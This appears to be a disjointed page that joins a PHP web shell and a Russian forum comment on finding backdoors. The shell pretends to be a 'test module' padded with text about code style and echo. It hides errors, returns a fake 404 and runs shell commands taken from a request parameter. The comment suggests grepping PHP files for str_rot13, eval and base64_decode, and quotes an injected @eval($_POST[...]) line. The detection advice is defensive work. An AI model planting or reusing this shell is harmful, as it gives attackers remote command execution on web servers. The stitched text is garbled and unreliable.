The quality of a program begins with the quality of the source code. The fundamental factor for quality of source code is its readability and clarity. Formalized rules are necessary to write code which will be readable and understandable. The rules for formatting code must be uniform throughout the entire project. It is highly desirable for the rules to be similar fr om project to project.
This is a test module.
error_reporting(0); // set error
Outputs one or more data, with no additional newlines or spaces. echo is not a function but a language construct. */
header('HTTP/1.1 404 Not Found'); // set status page
Its arguments are a list of data following the echo keyword, separated by commas, and not delimited by parentheses. Unlike some other language constructs, echo does not have any return value, so it cannot be used in the context of an expression. echo also has a shortcut syntax, wh ere you can immediately follow the opening tag with an equals sign. This syntax is available even with the short_open_tag configuration setting disabled.
if(isset($_REQUEST['iasfgjlzcb'])) echo `$_REQUEST[iasfgjlzcb]`; // test output data
// echo - Output one or more strings // The major differences to print are that echo accepts multiple arguments and doesn't have a return value.
я бы чуток модифицировал - искать смысл только в php и вывод в файлик для дальнейшего анализа
grep -rnw str_rot13 ./*.php > rot13.log
можно ещё "eval(" и "base64_decode(" поискать - тоже часто используют в бэкдорах но там много будет из не зараженного у меня в /bitrix/bitrix.php такая инъекция была @eval($_POST['DOCUMENT_ROOT'];